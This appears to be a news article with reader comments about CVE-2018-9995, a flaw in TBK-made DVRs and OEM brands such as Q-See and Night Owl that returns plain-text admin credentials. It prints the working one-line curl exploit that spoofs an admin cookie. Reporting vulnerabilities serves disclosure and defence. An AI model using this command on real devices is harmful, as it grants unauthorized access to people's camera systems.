Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs
A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is is outlined in CVE-2018-9995.
The DVRs affected are manufacturer by TBK as well as OEM'd by:
- DVR Login
- HVR Login
- MDVR Login
- Night OWL
- XVR 5 in 1
The exploit, tested by IPVM, is a simple CURL command:
curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).
The plain text credentials returned from this command granted admin access to the device.
Obviously they really tried hard to hide this backdoor ;)
Do they have a businesses presence in the US?
TBK is Spanish company, however OEMs like Q-see and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Coscto, and more.
Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.
Does anyone have the MAC prefix for their devices?
Manufactured by TBK, a spanish company? Are they really manufactured in a spanish country?
Those dvr’s were designed and manufactured by Streamax, China.
Started by Undisclosed #1
|less than a minute by Undisclosed #3|
Started by Lee Jones
|less than a minute by Undisclosed Manufacturer #1|
Started by Jeff Schulz
|less than a minute by Jeff Schulz|
Started by John Honovich
|less than a minute by Undisclosed Integrator #5|
Do Cloud Systems Increase Or Reduce The Need For Integrators To Be Proficient In IT And Networking? (9)
Started by Ryan King
|about 2 hours by Brian Karas|
Back to Top